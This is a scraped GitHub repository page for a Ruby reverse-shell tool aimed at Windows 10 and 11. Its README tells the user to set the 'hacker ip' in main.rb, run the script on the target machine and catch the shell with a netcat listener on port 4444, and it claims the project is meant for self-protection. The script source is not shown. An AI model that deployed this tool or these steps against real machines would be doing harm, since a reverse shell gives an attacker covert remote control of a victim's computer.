DioBruh / reverse-shell-windows

windows 11, 10 reverse shell

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

πŸ¦‘ shell-reverse-windows

GitHub repo size GitHub language count GitHub forks Bitbucket open issues Bitbucket open pull requests

A simple ruby reverse-shell windows 10, 11

My goal with this is not to black hat and throw around something that will screw someone is literally the opposite is to help you protect yourself

πŸ’» Requirements

  • Latest Ruby version.

β˜• Using

Clone the repository using:

git clone https://github.com/DioBruh/backdoor-windows

Export attacker ip in main.rb

RHOST = '' # Hacker ip.

If you don't know your ip, use:"

ifconfig

πŸ’» Init

  • Init archive main.rb on target machine.
  • Start a listen on your pc listening to port 4444 with the command nc -lvnp 4444
  • Wait for connection.

🀝 Contributors.

Foto do DIO
Dio Brando

About

windows 11, 10 reverse shell

License:Apache License 2.0


Languages

Language:Ruby 100.0%